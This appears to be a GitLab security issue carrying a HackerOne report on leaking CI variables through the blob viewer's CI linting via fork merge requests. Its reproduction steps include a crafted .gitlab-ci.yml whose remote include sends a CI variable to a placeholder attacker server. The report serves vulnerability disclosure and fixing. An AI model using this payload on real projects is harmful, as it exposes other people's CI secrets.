Backend: Leaking CI variables by visiting the blob page via fork MRs
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1875515 by shells3c
on 2023-02-15, assigned to @cmaxim:
Report
SSOT
Refer to #417275 (closed)
Summary
When viewing the Gitlab CI configuration, Gitlab runs CI linting on the file content
app/models/blob_viewer/gitlab_ci_yml.rb
def validation_message(opts)
return [@]validation_message if defined?([@]validation_message)
prepare!
[@]validation_message = Gitlab::Ci::Lint
.new(project: opts[:project], current_user: opts[:user], sha: opts[:sha])
.validate(blob.data).errors.first
end
The CI validation is run within the context of the viewed project, therefore project's CI variables can be used here. blob.data
is the CI configuration content from a blob of the project and can be manipulated because even without Developer permission, I still can push a blob to the project by creating a merge request (commits of merge request will be fetched into the repository object pool). This allows me to run CI lint on the project without create_pipeline
permission (the permission is checked in the CI lint API and GraphQL)
Steps to reproduce
- Create a project, create a CI variable in General > CI/CD > Variables, let say
variable_x
- As the attacker, fork the project, and edit the CI configuration (
.gitlab-ci.yml
by default) with the following content (replace<ATTACKER SERVER>
):
include:
remote: 'http://<ATTACKER SERVER>/${variable_x}.yaml
- Create a merge request with the previous change
- Now grab the commit SHA, visit this link and the variable will be sent to your server:
https://gitlab.com/<victim>/<project>/-/blob/<sha>/.gitlab-ci.yml
Output of checks
This bug happens on GitLab.com
Impact
Unauthorized users can leak CI variables
Proposal
How To Reproduce
Please add reproducibility information to this section:
This page may contain information related to upcoming products, features and functionality. It is important to note that the information presented is for informational purposes only, so please do not rely on the information for purchasing or planning purposes. Just like with all projects, the items mentioned on the page are subject to change or delay, and the development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.